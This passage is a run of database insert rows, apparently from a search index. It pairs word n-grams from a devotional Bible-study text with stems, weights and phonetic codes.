(286348, '23-24 to be', '23-24 to be', 0, 1, 1.3667, 'T100', 1, '*'),
(286349, '24 16', '24 16', 0, 1, 1.1667, '', 1, '*'),
(286350, '24 16 for', '24 16 for', 0, 1, 1.3, 'F600', 1, '*'),
(286351, '26 7', '26 7', 0, 1, 1.1333, '', 1, '*'),
(286352, '26 7 1', '26 7 1', 0, 1, 1.2, '', 1, '*'),
(286353, '26 7 the', '26 7 the', 0, 1, 1.2667, 'T000', 1, '*'),
(286354, '26 prov.16', '26 prov.16', 0, 1, 1.3333, 'P610', 1, '*'),
(286355, '26 prov.16 7', '26 prov.16 7', 0, 1, 1.4, 'P610', 1, '*'),
(286356, '2cor.5', '2cor.5', 0, 0, 0.4, 'C600', 1, '*'),
(286357, '2cor.5 10', '2cor.5 10', 0, 1, 1.3, 'C600', 1, '*'),
(286358, '2cor.5 10 amos', '2cor.5 10 amos', 0, 1, 1.4667, 'C652', 1, '*'),
(286359, '2cor13', '2cor13', 0, 0, 0.4, 'C600', 1, '*'),
(286360, '2cor13 5', '2cor13 5', 0, 1, 1.2667, 'C600', 1, '*'),
(286361, '2cor13 5 why', '2cor13 5 why', 0, 1, 1.4, 'C600', 1, '*'),
(286362, '2kings', '2king', 0, 0, 0.4, 'K520', 1, '*'),
(286363, '2kings 5', '2king 5', 0, 1, 1.2667, 'K520', 1, '*'),
(286364, '2kings 5 15-19', '2king 5 15-19', 0, 1, 1.4667, 'K520', 1, '*'),
(286365, '3 he', '3 he', 0, 1, 1.1333, 'H000', 1, '*'),
(286366, '3 he tests', '3 he tests', 0, 1, 1.3333, 'H3232', 1, '*'),
(286367, '3 proverbs', '3 proverbs', 0, 1, 1.3333, 'P61612', 1, '*'),
(286368, '3 proverbs 16', '3 proverbs 16', 0, 1, 1.4333, 'P61612', 1, '*'),
(286369, '3 talk', '3 talk', 0, 1, 1.2, 'T420', 1, '*'),
(286370, '3 talk no', '3 talk no', 0, 1, 1.3, 'T425', 1, '*'),
(286371, '31 lean', '31 lean', 0, 1, 1.2333, 'L500', 1, '*'),
(286372, '31 lean to', '31 lean to', 0, 1, 1.3333, 'L530', 1, '*'),
(286373, '38 recognizing', '38 recognizing', 0, 1, 1.4667, 'R25252', 1, '*'),
(286374, '38 recognizing the', '38 recognizing the', 0, 1, 1.6, 'R252523', 1, '*'),
(286375, '4 he', '4 he', 0, 1, 1.1333, 'H000', 1, '*'),
(286376, '4 he tests', '4 he tests', 0, 1, 1.3333, 'H3232', 1, '*'),
(286377, '4-9', '4-9', 0, 0, 0.3, '', 1, '*'),
(286378, '4-9 6', '4-9 6', 0, 1, 1.1667, '', 1, '*'),
(286379, '4-9 6 he', '4-9 6 he', 0, 1, 1.2667, 'H000', 1, '*'),
(286380, '40 20-31', '40 20-31', 0, 1, 1.2667, '', 1, '*'),
(286381, '40 20-31 ps.30', '40 20-31 ps.30', 0, 1, 1.4667, 'P200', 1, '*'),
(286382, '5 1-11', '5 1-11', 0, 1, 1.2, '', 1, '*'),
(286383, '5 1-11 2kings', '5 1-11 2kings', 0, 1, 1.4333, 'K520', 1, '*'),
(286384, '5 12-15', '5 12-15', 0, 1, 1.2333, '', 1, '*'),
(286385, '5 12-15 here', '5 12-15 here', 0, 1, 1.4, 'H600', 1, '*'),
(286386, '5 15-19', '5 15-19', 0, 1, 1.2333, '', 1, '*'),
(286387, '5 15-19 learn', '5 15-19 learn', 0, 1, 1.4333, 'L650', 1, '*'),
(286388, '5 he', '5 he', 0, 1, 1.1333, 'H000', 1, '*'),
(286389, '5 he tests', '5 he tests', 0, 1, 1.3333, 'H3232', 1, '*'),
(286390, '5 why', '5 why', 0, 1, 1.1667, 'W000', 1, '*'),
(286391, '5 why should', '5 why should', 0, 1, 1.4, 'W243', 1, '*'),
(286392, '56', '56', 0, 0, 0.2, '', 2, '*'),
(286393, '56 ps.40', '56 ps.40', 0, 1, 1.2667, 'P200', 1, '*'),
(286394, '56 ps.40 20-31', '56 ps.40 20-31', 0, 1, 1.4667, 'P200', 1, '*'),
(286395, '6 26', '6 26', 0, 1, 1.1333, '', 1, '*'),
(286396, '6 26 prov.16', '6 26 prov.16', 0, 1, 1.4, 'P610', 1, '*'),
(286397, '6 he', '6 he', 0, 1, 1.1333, 'H000', 1, '*'),
(286398, '6 he tests', '6 he tests', 0, 1, 1.3333, 'H3232', 1, '*'),
(286399, '7 1', '7 1', 0, 1, 1.1, '', 1, '*'),
(286400, '7 1 19-20', '7 1 19-20', 0, 1, 1.3, '', 1, '*'),
(286401, '7 1 samuel', '7 1 samuel', 0, 1, 1.3333, 'S540', 1, '*'),
(286402, '7 for', '7 for', 0, 1, 1.1667, 'F600', 1, '*'),
(286403, '7 for you', '7 for you', 0, 1, 1.3, 'F600', 1, '*'),
(286404, '7 luke', '7 luke', 0, 1, 1.2, 'L200', 1, '*'),
(286405, '7 luke 6', '7 luke 6', 0, 1, 1.2667, 'L200', 1, '*'),
(286406, '7 the', '7 the', 0, 1, 1.1667, 'T000', 1, '*'),
(286407, '7 the way', '7 the way', 0, 1, 1.3, 'T000', 1, '*'),
(286408, '8 18-20', '8 18-20', 0, 1, 1.2333, '', 1, '*'),
(286409, '8 18-20 gen.31', '8 18-20 gen.31', 0, 1, 1.4667, 'G500', 1, '*'),
(286410, '8-10', '8-10', 0, 0, 0.4, '', 1, '*'),
(286411, '8-10 1king', '8-10 1king', 0, 1, 1.3333, 'K520', 1, '*'),
(286412, '8-10 1king 21', '8-10 1king 21', 0, 1, 1.4333, 'K520', 1, '*'),
(286413, 'a god', 'a god', 0, 1, 1.1667, 'A230', 2, '*'),
(286414, 'a god of', 'a god of', 0, 1, 1.2667, 'A231', 2, '*'),
(286415, 'a good testimony', 'a good testimony', 0, 1, 1.5333, 'A23235', 1, '*'),
(286416, 'a good witness', 'a good witness', 0, 1, 1.4667, 'A2352', 1, '*'),
(286417, 'a man are', 'a man are', 0, 1, 1.3, 'A560', 1, '*'),
(286418, 'ability to handle', 'abil to handle', 0, 1, 1.5667, 'A143534', 1, '*'),
(286419, 'about you', 'about you', 0, 1, 1.3, 'A130', 1, '*'),
(286420, 'about you 1sam.16', 'about you 1sam.16', 0, 1, 1.5667, 'A1325', 1, '*'),
(286421, 'actions', 'action', 0, 0, 0.4667, 'A2352', 1, '*'),
(286422, 'actions are', 'action are', 0, 1, 1.3667, 'A23526', 1, '*'),
(286423, 'actions are weighed', 'action are weighed', 0, 1, 1.6333, 'A2352623', 1, '*'),
(286424, 'actions thoughts', 'action thoughts', 0, 1, 1.5333, 'A23523232', 1, '*'),
(286425, 'actions thoughts and', 'action thoughts and', 0, 1, 1.6667, 'A2352323253', 1, '*'),
(286426, 'acts 24', 'act 24', 0, 1, 1.2333, 'A232', 1, '*'),
(286427, 'acts 24 16', 'act 24 16', 0, 1, 1.3333, 'A232', 1, '*'),
(286428, 'acts 5 1-11', 'act 5 1-11', 0, 1, 1.3667, 'A232', 1, '*'),
(286429, 'acts 8', 'act 8', 0, 1, 1.2, 'A232', 1, '*'),
(286430, 'acts 8 18-20', 'act 8 18-20', 0, 1, 1.4, 'A232', 1, '*'),
(286431, 'after death', 'after death', 0, 1, 1.3667, 'A1363', 1, '*'),
(286432, 'after death 2cor.5', 'after death 2cor.5', 0, 1, 1.6, 'A136326', 1, '*'),
(286433, 'all the ways', 'all the ways', 0, 1, 1.4, 'A432', 1, '*'),
(286434, 'amos', 'amo', 0, 0, 0.2667, 'A520', 1, '*'),
(286435, 'amos 5', 'amo 5', 0, 1, 1.2, 'A520', 1, '*'),
(286436, 'amos 5 12-15', 'amo 5 12-15', 0, 1, 1.4, 'A520', 1, '*'),
(286437, 'and by', 'and by', 0, 1, 1.2, 'A531', 1, '*'),
(286438, 'and by him', 'and by him', 0, 1, 1.3333, 'A5315', 1, '*'),
(286439, 'and by his', 'and by his', 0, 1, 1.3333, 'A5312', 1, '*'),
(286440, 'and correct', 'and correct', 0, 1, 1.3667, 'A532623', 1, '*'),
(286441, 'and correct anything', 'and correct anything', 0, 1, 1.6667, 'A5326235352', 1, '*'),
(286442, 'and intentions', 'and intentions', 0, 1, 1.4667, 'A53535352', 1, '*'),
(286443, 'and intentions of', 'and intentions of', 0, 1, 1.5667, 'A535353521', 1, '*'),
(286444, 'and man', 'and man', 0, 1, 1.2333, 'A535', 1, '*'),
(286445, 'and man acts', 'and man acts', 0, 1, 1.4, 'A535232', 1, '*'),
(286446, 'and man to', 'and man to', 0, 1, 1.3333, 'A5353', 1, '*'),
(286447, 'and sincerity', 'and sincerity', 0, 1, 1.4333, 'A5325263', 1, '*'),
(286448, 'and sincerity acts', 'and sincerity acts', 0, 1, 1.6, 'A5325263232', 1, '*'),
(286449, 'and you shall', 'and you shall', 0, 1, 1.4333, 'A5324', 1, '*'),
(286450, 'anything that may', 'anyth that may', 0, 1, 1.5667, 'A535235', 1, '*'),
(286451, 'are clean', 'ar clean', 0, 1, 1.3, 'A6245', 1, '*'),
(286452, 'are clean in', 'ar clean in', 0, 1, 1.4, 'A6245', 1, '*'),
(286453, 'are measures', 'ar measures', 0, 1, 1.4, 'A65262', 1, '*'),
(286454, 'are measures that', 'ar measures that', 0, 1, 1.5667, 'A652623', 1, '*'),
(286455, 'are on', 'ar on', 0, 1, 1.2, 'A650', 2, '*'),
(286456, 'are on the', 'ar on the', 0, 1, 1.3333, 'A653', 1, '*'),
(286457, 'are weighed', 'ar weighed', 0, 1, 1.3667, 'A623', 1, '*'),
(286458, 'arrogancy', 'arrog', 0, 0, 0.6, 'A6252', 1, '*'),
(286459, 'arrogancy come', 'arrog come', 0, 1, 1.4667, 'A62525', 1, '*'),
(286460, 'arrogancy come out', 'arrog come out', 0, 1, 1.6, 'A625253', 1, '*'),
(286461, 'attitude to money', 'attitud to money', 0, 1, 1.5667, 'A350', 1, '*'),
(286462, 'be a good', 'be a good', 0, 1, 1.3, 'B230', 1, '*'),
(286463, 'be displeasing', 'be displeasing', 0, 1, 1.4667, 'B3214252', 1, '*'),
(286464, 'be displeasing to', 'be displeasing to', 0, 1, 1.5667, 'B32142523', 1, '*'),
(286465, 'before god ps.139', 'befor god ps.139', 0, 1, 1.5667, 'B62312', 1, '*'),
(286466, 'before him', 'befor him', 0, 1, 1.3333, 'B650', 1, '*'),
(286467, 'before him 1', 'befor him 1', 0, 1, 1.4, 'B650', 1, '*'),
(286468, 'believer to', 'believ to', 0, 1, 1.3667, 'B4163', 1, '*'),
(286469, 'believer to know', 'believ to know', 0, 1, 1.5333, 'B416325', 1, '*'),
(286470, 'by him', 'by him', 0, 1, 1.2, 'B500', 1, '*'),
(286471, 'by him actions', 'by him actions', 0, 1, 1.4667, 'B52352', 1, '*'),
(286472, 'by his spirit', 'by his spirit', 0, 1, 1.4333, 'B2163', 1, '*'),
(286473, 'christians to know', 'christian to know', 0, 1, 1.6, 'C62352325', 1, '*'),
(286474, 'clean in', 'clean in', 0, 1, 1.2667, 'C450', 1, '*'),
(286475, 'clean in his', 'clean in his', 0, 1, 1.4, 'C452', 1, '*'),
(286476, 'come out', 'come out', 0, 1, 1.2667, 'C530', 1, '*'),
(286477, 'come out of', 'come out of', 0, 1, 1.3667, 'C531', 1, '*'),
(286478, 'conscious of', 'consciou of', 0, 1, 1.4, 'C521', 1, '*'),
(286479, 'conscious of this', 'consciou of this', 0, 1, 1.5667, 'C52132', 1, '*'),
(286480, 'correct anything', 'correct anything', 0, 1, 1.5333, 'C6235352', 1, '*'),
(286481, 'correct anything that', 'correct anything that', 0, 1, 1.7, 'C62353523', 1, '*'),
(286482, 'counsels', 'counsel', 0, 0, 0.5333, 'C5242', 1, '*'),
(286483, 'counsels job', 'counsel job', 0, 1, 1.4, 'C52421', 1, '*'),
(286484, 'counsels job 2', 'counsel job 2', 0, 1, 1.4667, 'C52421', 1, '*'),
(286485, 'damnation', 'damnat', 0, 0, 0.6, 'D535', 1, '*'),
(286486, 'damnation prov.14', 'damnat prov.14', 0, 1, 1.5667, 'D535161', 1, '*'),
(286487, 'damnation prov.14 12', 'damnat prov.14 12', 0, 1, 1.6667, 'D535161', 1, '*'),
(286488, 'dan.3', 'dan.3', 0, 0, 0.3333, 'D500', 1, '*'),
(286489, 'dan.3 16-18', 'dan.3 16-18', 0, 1, 1.3667, 'D500', 1, '*'),
(286490, 'dan.3 16-18 john', 'dan.3 16-18 john', 0, 1, 1.5333, 'D525', 1, '*'),
(286491, 'death 2cor.5', 'death 2cor.5', 0, 1, 1.4, 'D260', 1, '*'),
(286492, 'death 2cor.5 10', 'death 2cor.5 10', 0, 1, 1.5, 'D260', 1, '*'),
(286493, 'destination after', 'destin after', 0, 1, 1.5667, 'D23535136', 1, '*'),
(286494, 'destination after death', 'destin after death', 0, 1, 1.7667, 'D235351363', 1, '*'),
(286495, 'displeasing', 'displeas', 0, 0, 0.7333, 'D214252', 1, '*'),
(286496, 'displeasing to', 'displeas to', 0, 1, 1.4667, 'D2142523', 1, '*'),
(286497, 'displeasing to the', 'displeas to the', 0, 1, 1.6, 'D2142523', 1, '*'),
(286498, 'divine scale', 'divin scale', 0, 1, 1.4, 'D1524', 1, '*'),
(286499, 'divine scale this', 'divin scale this', 0, 1, 1.5667, 'D152432', 1, '*'),
(286500, 'do before', 'do before', 0, 1, 1.3, 'D160', 1, '*'),
(286501, 'do before him', 'do before him', 0, 1, 1.4333, 'D165', 1, '*'),
(286502, 'does not judge', 'doe not judge', 0, 1, 1.4667, 'D253232', 1, '*'),
(286503, 'does not trust', 'doe not trust', 0, 1, 1.4667, 'D253623', 1, '*'),
(286504, 'dost', 'dost', 0, 0, 0.2667, 'D230', 1, '*'),
(286505, 'dost weigh', 'dost weigh', 0, 1, 1.3333, 'D232', 1, '*'),
(286506, 'dost weigh the', 'dost weigh the', 0, 1, 1.4667, 'D2323', 1, '*'),
(286507, 'eternal destination', 'etern destination', 0, 1, 1.6333, 'E3654323535', 1, '*'),
(286508, 'eternal destination after', 'etern destination after', 0, 1, 1.8333, 'E3654323535136', 1, '*'),
(286509, 'every believer', 'everi believer', 0, 1, 1.4667, 'E161416', 1, '*'),
(286510, 'every believer to', 'everi believer to', 0, 1, 1.5667, 'E1614163', 1, '*'),
(286511, 'every man', 'everi man', 0, 1, 1.3, 'E165', 1, '*'),
(286512, 'every man dan.3', 'everi man dan.3', 0, 1, 1.5, 'E16535', 1, '*'),
(286513, 'evil counsels', 'evil counsels', 0, 1, 1.4333, 'E1425242', 1, '*'),
(286514, 'evil counsels job', 'evil counsels job', 0, 1, 1.5667, 'E14252421', 1, '*'),
(286515, 'examine yourself 2cor13', 'examin yourself 2cor13', 0, 1, 1.7667, 'E25624126', 1, '*'),
(286516, 'exceeding', 'exceed', 0, 0, 0.6, 'E2352', 3, '*'),
(286517, 'exceeding proudly', 'exceed proudly', 0, 1, 1.5667, 'E23521634', 1, '*'),
(286518, 'exceeding proudly let', 'exceed proudly let', 0, 1, 1.7, 'E235216343', 1, '*'),
(286519, 'expressed in', 'express in', 0, 1, 1.4, 'E216235', 1, '*'),
(286520, 'expressed in his', 'express in his', 0, 1, 1.5333, 'E2162352', 1, '*'),
(286521, 'eyes but', 'ey but', 0, 1, 1.2667, 'E213', 1, '*'),
(286522, 'eyes but the', 'ey but the', 0, 1, 1.4, 'E213', 1, '*'),
(286523, 'for every', 'for every', 0, 1, 1.3, 'F616', 2, '*'),
(286524, 'for every believer', 'for every believer', 0, 1, 1.6, 'F6161416', 1, '*'),
(286525, 'for god and', 'for god and', 0, 1, 1.3667, 'F62353', 1, '*'),
(286526, 'for us christians', 'for us christians', 0, 1, 1.5667, 'F6262352', 1, '*'),
(286527, 'found wanting in', 'found wanting in', 0, 1, 1.5333, 'F5353525', 1, '*'),
(286528, 'gen.31', 'gen.31', 0, 0, 0.4, 'G500', 1, '*'),
(286529, 'gen.31 1-6', 'gen.31 1-6', 0, 1, 1.3333, 'G500', 1, '*'),
(286530, 'gen.31 1-6 4', 'gen.31 1-6 4', 0, 1, 1.4, 'G500', 1, '*'),
(286531, 'god and man', 'god and man', 0, 1, 1.3667, 'G3535', 1, '*'),
(286532, 'god of', 'god of', 0, 1, 1.2, 'G310', 2, '*'),
(286533, 'god of knowledge', 'god of knowledge', 0, 1, 1.5333, 'G3125432', 1, '*'),
(286534, 'god ps.139', 'god ps.139', 0, 1, 1.3333, 'G312', 1, '*'),
(286535, 'god ps.139 23-24', 'god ps.139 23-24', 0, 1, 1.5333, 'G312', 1, '*'),
(286536, 'god uses', 'god uses', 0, 1, 1.2667, 'G320', 1, '*'),
(286537, 'god uses for', 'god uses for', 0, 1, 1.4, 'G3216', 1, '*'),
(286538, 'god weighs actions', 'god weighs actions', 0, 1, 1.6, 'G32352', 1, '*'),
(286539, 'god\'s will', 'god will', 0, 1, 1.3333, 'G324', 1, '*'),
(286540, 'god\'s will expressed', 'god will expressed', 0, 1, 1.6667, 'G32421623', 1, '*'),
(286541, 'good testimony', 'good testimony', 0, 1, 1.4667, 'G3235', 1, '*'),
(286542, 'good testimony about', 'good testimony about', 0, 1, 1.6667, 'G323513', 1, '*'),
(286543, 'good witness', 'good witness', 0, 1, 1.4, 'G352', 1, '*'),
(286544, 'good witness before', 'good witness before', 0, 1, 1.6333, 'G35216', 1, '*'),
(286545, 'handle the', 'handl the', 0, 1, 1.3333, 'H5343', 1, '*'),
(286546, 'handle the passage', 'handl the passage', 0, 1, 1.6, 'H534312', 1, '*'),
(286547, 'he tests', 'he tests', 0, 1, 1.2667, 'H3232', 1, '*'),
(286548, 'he tests every', 'he tests every', 0, 1, 1.4667, 'H323216', 1, '*'),
(286549, 'he tests your', 'he tests your', 0, 1, 1.4333, 'H32326', 1, '*'),
(286550, 'help you to', 'help you to', 0, 1, 1.3667, 'H413', 1, '*'),
(286551, 'here are measures', 'here are measures', 0, 1, 1.5667, 'H65262', 1, '*'),
(286552, 'him 1', 'him 1', 0, 1, 1.1667, 'H500', 2, '*'),
(286553, 'him 1 he', 'him 1 he', 0, 1, 1.2667, 'H500', 1, '*'),
(286554, 'him actions', 'him actions', 0, 1, 1.3667, 'H52352', 1, '*'),
(286555, 'him actions are', 'him actions are', 0, 1, 1.5, 'H523526', 1, '*'),
(286556, 'his own eyes', 'hi own eyes', 0, 1, 1.4, 'H252', 1, '*'),
(286557, 'his spirit and', 'hi spirit and', 0, 1, 1.4667, 'H216353', 1, '*'),
(286558, 'how we do', 'how we do', 0, 1, 1.3, 'H300', 1, '*'),
(286559, 'important for every', 'import for every', 0, 1, 1.6333, 'I5163531616', 1, '*'),
(286560, 'in his own', 'in his own', 0, 1, 1.3333, 'I525', 1, '*'),
(286561, 'intentions', 'intent', 0, 0, 0.6667, 'I535352', 1, '*'),
(286562, 'intentions of', 'intent of', 0, 1, 1.4333, 'I5353521', 1, '*'),
(286563, 'intentions of man', 'intent of man', 0, 1, 1.5667, 'I53535215', 1, '*'),
(286564, 'introduction it', 'introduct it', 0, 1, 1.5, 'I53632353', 1, '*'),
(286565, 'introduction it is', 'introduct it is', 0, 1, 1.6, 'I536323532', 1, '*'),
(286566, 'is a god', 'is a god', 0, 1, 1.2667, 'I230', 2, '*'),
(286567, 'is important for', 'is important for', 0, 1, 1.5333, 'I251635316', 1, '*'),
(286568, 'is uprightness', 'is uprightness', 0, 1, 1.4667, 'I2162352', 1, '*'),
(286569, 'is uprightness thou', 'is uprightness thou', 0, 1, 1.6333, 'I21623523', 1, '*'),
(286570, 'isaiah 26', 'isaiah 26', 0, 1, 1.3, 'I200', 1, '*'),
(286571, 'isaiah 26 7', 'isaiah 26 7', 0, 1, 1.3667, 'I200', 1, '*'),
(286572, 'isaiah 40', 'isaiah 40', 0, 1, 1.3, 'I200', 1, '*'),
(286573, 'isaiah 40 20-31', 'isaiah 40 20-31', 0, 1, 1.5, 'I200', 1, '*'),
(286574, 'it is important', 'it is important', 0, 1, 1.5, 'I32516353', 1, '*'),
(286575, 'item 38', 'item 38', 0, 1, 1.2333, 'I350', 1, '*'),
(286576, 'item 38 recognizing', 'item 38 recognizing', 0, 1, 1.6333, 'I35625252', 1, '*'),
(286577, 'job 2', 'job 2', 0, 1, 1.1667, 'J100', 1, '*'),
(286578, 'job 2 8-10', 'job 2 8-10', 0, 1, 1.3333, 'J100', 1, '*'),
(286579, 'john 13', 'john 13', 0, 1, 1.2333, 'J500', 1, '*'),
(286580, 'john 13 15', 'john 13 15', 0, 1, 1.3333, 'J500', 1, '*'),
(286581, 'josh 7', 'josh 7', 0, 1, 1.2, 'J000', 1, '*'),
(286582, 'josh 7 1', 'josh 7 1', 0, 1, 1.2667, 'J000', 1, '*'),
(286583, 'judge you', 'judg you', 0, 1, 1.3, 'J320', 1, '*'),
(286584, 'judge you 1cor.11', 'judg you 1cor.11', 0, 1, 1.5667, 'J326', 1, '*'),
(286585, 'judge yourself god', 'judg yourself god', 0, 1, 1.6, 'J32624123', 1, '*'),
(286586, 'just introduction', 'just introduction', 0, 1, 1.5667, 'J35363235', 1, '*'),
(286587, 'just introduction it', 'just introduction it', 0, 1, 1.6667, 'J353632353', 1, '*'),
(286588, 'just is', 'just is', 0, 1, 1.2333, 'J320', 1, '*'),
(286589, 'just is uprightness', 'just is uprightness', 0, 1, 1.6333, 'J32162352', 1, '*'),
(286590, 'k2 item 38', 'k2 item 38', 0, 1, 1.3333, 'K350', 1, '*'),
(286591, 'know how we', 'know how we', 0, 1, 1.3667, 'K500', 1, '*'),
(286592, 'know where', 'know where', 0, 1, 1.3333, 'K560', 1, '*'),
(286593, 'know where you', 'know where you', 0, 1, 1.4667, 'K560', 1, '*'),
(286594, 'know whether', 'know whether', 0, 1, 1.4, 'K536', 1, '*'),
(286595, 'know whether you', 'know whether you', 0, 1, 1.5333, 'K536', 1, '*'),
(286596, 'know your', 'know your', 0, 1, 1.3, 'K560', 1, '*'),
(286597, 'know your eternal', 'know your eternal', 0, 1, 1.5667, 'K563654', 1, '*'),
(286598, 'knowledge and by', 'knowledg and by', 0, 1, 1.5333, 'K5432531', 1, '*'),
(286599, 'lean', 'lean', 0, 0, 0.2667, 'L500', 1, '*'),
(286600, 'lean to', 'lean to', 0, 1, 1.2333, 'L530', 1, '*'),
(286601, 'lean to examine', 'lean to examine', 0, 1, 1.5, 'L5325', 1, '*'),
(286602, 'learn to weigh', 'learn to weigh', 0, 1, 1.4667, 'L6532', 1, '*'),
(286603, 'let not', 'let not', 0, 1, 1.2333, 'L353', 1, '*'),
(286604, 'let not arrogancy', 'let not arrogancy', 0, 1, 1.5667, 'L3536252', 1, '*'),
(286605, 'life or', 'life or', 0, 1, 1.2333, 'L160', 1, '*'),
(286606, 'life or the', 'life or the', 0, 1, 1.3667, 'L163', 1, '*'),
(286607, 'lord if you', 'lord if you', 0, 1, 1.3667, 'L631', 1, '*'),
(286608, 'lord is a', 'lord is a', 0, 1, 1.3, 'L632', 1, '*'),
(286609, 'lord weigheth', 'lord weigheth', 0, 1, 1.4333, 'L6323', 1, '*'),
(286610, 'lord weigheth the', 'lord weigheth the', 0, 1, 1.5667, 'L6323', 1, '*'),
(286611, 'luke 6', 'luke 6', 0, 1, 1.2, 'L200', 1, '*'),
(286612, 'luke 6 26', 'luke 6 26', 0, 1, 1.3, 'L200', 1, '*'),
(286613, 'make you put', 'make you put', 0, 1, 1.4, 'M213', 1, '*'),
(286614, 'man acts', 'man acts', 0, 1, 1.2667, 'M232', 1, '*'),
(286615, 'man acts 24', 'man acts 24', 0, 1, 1.3667, 'M232', 1, '*'),
(286616, 'man are', 'man are', 0, 1, 1.2333, 'M600', 1, '*'),
(286617, 'man are clean', 'man are clean', 0, 1, 1.4333, 'M6245', 1, '*'),
(286618, 'man dan.3', 'man dan.3', 0, 1, 1.3, 'M350', 1, '*'),
(286619, 'man dan.3 16-18', 'man dan.3 16-18', 0, 1, 1.5, 'M350', 1, '*'),
(286620, 'man to have', 'man to have', 0, 1, 1.3667, 'M310', 1, '*'),
(286621, 'man walking', 'man walking', 0, 1, 1.3667, 'M4252', 1, '*'),
(286622, 'man walking conscious', 'man walking conscious', 0, 1, 1.7, 'M425252', 1, '*'),
(286623, 'matt.19', 'matt.19', 0, 0, 0.4667, 'M300', 1, '*'),
(286624, 'matt.19 16-21', 'matt.19 16-21', 0, 1, 1.4333, 'M300', 1, '*'),
(286625, 'matt.19 16-21 for', 'matt.19 16-21 for', 0, 1, 1.5667, 'M316', 1, '*'),
(286626, 'may be displeasing', 'mai be displeasing', 0, 1, 1.6, 'M13214252', 1, '*'),
(286627, 'measures that', 'measur that', 0, 1, 1.4333, 'M2623', 1, '*'),
(286628, 'measures that god', 'measur that god', 0, 1, 1.5667, 'M262323', 1, '*'),
(286629, 'misbehaving', 'misbehav', 0, 0, 0.7333, 'M2152', 1, '*'),
(286630, 'misbehaving 3', 'misbehav 3', 0, 1, 1.4333, 'M2152', 1, '*'),
(286631, 'misbehaving 3 he', 'misbehav 3 he', 0, 1, 1.5333, 'M2152', 1, '*'),
(286632, 'money and the', 'monei and the', 0, 1, 1.4333, 'M300', 1, '*'),
(286633, 'more so', 'more so', 0, 1, 1.2333, 'M620', 1, '*'),
(286634, 'more so exceeding', 'more so exceeding', 0, 1, 1.5667, 'M62352', 1, '*'),
(286635, 'most upright', 'most upright', 0, 1, 1.4, 'M231623', 1, '*'),
(286636, 'most upright dost', 'most upright dost', 0, 1, 1.5667, 'M23162323', 1, '*'),
(286637, 'mouth for', 'mouth for', 0, 1, 1.3, 'M316', 1, '*'),
(286638, 'mouth for the', 'mouth for the', 0, 1, 1.4333, 'M3163', 1, '*'),
(286639, 'no more so', 'no more so', 0, 1, 1.3333, 'N620', 1, '*'),
(286640, 'not arrogancy', 'not arrogancy', 0, 1, 1.4333, 'N36252', 1, '*'),
(286641, 'not arrogancy come', 'not arrogancy come', 0, 1, 1.6, 'N362525', 1, '*'),
(286642, 'not be found', 'not be found', 0, 1, 1.4, 'N3153', 1, '*'),
(286643, 'not judge', 'not judge', 0, 1, 1.3, 'N3232', 1, '*'),
(286644, 'not judge you', 'not judge you', 0, 1, 1.4333, 'N3232', 1, '*'),
(286645, 'not trust', 'not trust', 0, 1, 1.3, 'N3623', 1, '*'),
(286646, 'not trust the', 'not trust the', 0, 1, 1.4333, 'N3623', 1, '*'),
(286647, 'num.20', 'num.20', 0, 0, 0.4, 'N000', 1, '*'),
(286648, 'num.20 10-12', 'num.20 10-12', 0, 1, 1.4, 'N000', 1, '*'),
(286649, 'num.20 10-12 5', 'num.20 10-12 5', 0, 1, 1.4667, 'N000', 1, '*'),
(286650, 'obedience 1sam.15-21-22', 'obedi 1sam.15-21-22', 0, 1, 1.7667, 'O13525', 1, '*'),
(286651, 'obedience 1sam.15-21-22 num.20', 'obedi 1sam.15-21-22 num.20', 0, 1, 2, 'O13525', 1, '*'),
(286652, 'of damnation', 'of damnation', 0, 1, 1.4, 'O13535', 1, '*'),
(286653, 'of damnation prov.14', 'of damnation prov.14', 0, 1, 1.6667, 'O13535161', 1, '*'),
(286654, 'of god\'s will', 'of god will', 0, 1, 1.4333, 'O12324', 1, '*'),
(286655, 'of life or', 'of life or', 0, 1, 1.3333, 'O1416', 1, '*'),
(286656, 'of man walking', 'of man walking', 0, 1, 1.4667, 'O154252', 1, '*'),
(286657, 'of the just', 'of the just', 0, 1, 1.3667, 'O1323', 1, '*'),
(286658, 'of this would', 'of this would', 0, 1, 1.4333, 'O13243', 1, '*'),
(286659, 'of time without', 'of time without', 0, 1, 1.5, 'O1353', 1, '*'),
(286660, 'on the divine', 'on the divine', 0, 1, 1.4333, 'O5315', 1, '*'),
(286661, 'on the path', 'on the path', 0, 1, 1.3667, 'O5313', 1, '*'),
(286662, 'or the path', 'or the path', 0, 1, 1.3667, 'O6313', 1, '*'),
(286663, 'own eyes', 'own eyes', 0, 1, 1.2667, 'O520', 1, '*'),
(286664, 'own eyes but', 'own eyes but', 0, 1, 1.4, 'O5213', 1, '*'),
(286665, 'passage', 'passag', 0, 0, 0.4667, 'P200', 1, '*'),
(286666, 'passage of', 'passag of', 0, 1, 1.3333, 'P210', 1, '*'),
(286667, 'passage of time', 'passag of time', 0, 1, 1.5, 'P2135', 1, '*'),
(286668, 'path of damnation', 'path of damnation', 0, 1, 1.5667, 'P313535', 1, '*'),
(286669, 'path of life', 'path of life', 0, 1, 1.4, 'P3141', 1, '*'),
(286670, 'path of the', 'path of the', 0, 1, 1.3667, 'P313', 1, '*'),
(286671, 'patience is the', 'patienc is the', 0, 1, 1.5, 'P3523', 1, '*'),
(286672, 'patience isaiah', 'patienc isaiah', 0, 1, 1.5, 'P352', 1, '*'),
(286673, 'patience isaiah 40', 'patienc isaiah 40', 0, 1, 1.6, 'P352', 1, '*'),
(286674, 'perfect before', 'perfect before', 0, 1, 1.4667, 'P612316', 1, '*'),
(286675, 'perfect before god', 'perfect before god', 0, 1, 1.6, 'P61231623', 1, '*'),
(286676, 'proudly', 'proudli', 0, 0, 0.4667, 'P634', 1, '*'),
(286677, 'proudly let', 'proudli let', 0, 1, 1.3667, 'P6343', 1, '*'),
(286678, 'proudly let not', 'proudli let not', 0, 1, 1.5, 'P634353', 1, '*'),
(286679, 'prov.14', 'prov.14', 0, 0, 0.4667, 'P610', 1, '*'),
(286680, 'prov.14 12', 'prov.14 12', 0, 1, 1.3333, 'P610', 1, '*'),
(286681, 'prov.14 12 matt.19', 'prov.14 12 matt.19', 0, 1, 1.6, 'P6153', 1, '*'),
(286682, 'prov.16', 'prov.16', 0, 0, 0.4667, 'P610', 1, '*'),
(286683, 'prov.16 7', 'prov.16 7', 0, 1, 1.3, 'P610', 1, '*'),
(286684, 'prov.16 7 for', 'prov.16 7 for', 0, 1, 1.4333, 'P616', 1, '*'),
(286685, 'proverbs 16', 'proverb 16', 0, 1, 1.3667, 'P61612', 1, '*'),
